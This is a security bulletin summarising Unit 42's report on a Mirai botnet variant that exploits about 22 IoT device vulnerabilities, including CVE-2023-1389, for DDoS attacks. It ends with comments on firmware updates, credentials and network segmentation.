Cyber Security Threat Summary:
Researchers from Palo Alto Networks’ Unit 42 have detected a modified version of the Mirai botnet, which is actively exploiting nearly 20 vulnerabilities. The primary objective of this botnet is to compromise devices manufactured by D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. These compromised devices are then utilized to launch distributed of denial of service attacks (DDoS) attacks. Unit 42 researchers have identified this malware in two ongoing campaigns that initiated on March 14th and experienced a significant surge in activity during the months of April and June. According to a recent report, researchers have issued a warning regarding the continuous expansion of code by botnet developers to exploit vulnerabilities. This malware specifically targets a staggering total of 22 known security weaknesses found in various connected devices. The affected products include routers, DVRs, NVRs, WiFi communication dongles, thermal monitoring systems, access control systems, and solar power generation monitors. Among these vulnerabilities, one noteworthy flaw is CVE-2023-1389, which impacts the TP-LINK Archer A21 (AX1800) WiFi router.

The Zero-Day Initiative (ZDI) reported that this vulnerability has been exploited by the Mirai malware since late April. However, it remains uncertain if these two incidents are related. The attack commences by exploiting one of the mentioned vulnerabilities, providing a foundation for executing a shell script obtained from an external source. This script is responsible for downloading the botnet client that corresponds to the architecture of the compromised device. Once the bot client is executed, the shell script downloader erases the client’s file to remove any traces of infection and decrease the chances of detection.

In contrast to typical Mirai variants currently in circulation, this particular variant directly accesses encrypted strings within the .rodata section by utilizing an index. It bypasses the need for a string table to retrieve the configuration of the botnet client. This approach enables the malware to operate swiftly and covertly, reducing the likelihood of detection by security tools and enhancing its stealth capabilities.

Security Officer Comments:
Unit 42 further highlights that this particular Mirai variant lacks the capability to engage in brute force attacks on telnet/SSH login credentials. As a result, its distribution relies solely on manual exploitation of vulnerabilities by the operators. To mitigate the risk of infection, it is advisable to take several precautions. These include applying the latest firmware update provided by the device vendor or manufacturer, replacing default access credentials with strong and unique ones, and disabling remote admin panel access if it is not required. Indications of a potential botnet malware infection on an IoT device may include excessive overheating, alterations in setting or configuration, frequent disconnections, and a general decline in overall performance.

Suggested Correction(s):
Users should be wary of IoT devices that lack traditional security features. Many IoT devices do not have multi-factor authentication or even the ability to change default usernames and passwords. Cybercriminal will continue to target the ever growing IoT device market.

If IoT devices must be used, users should consider segmenting them from sensitive networks.

Once a device has been compromised by a botnet, users may notice slow or sluggish systems and/or unusual traffic on the network.

Link(s):
https://www.bleepingcomputer.com/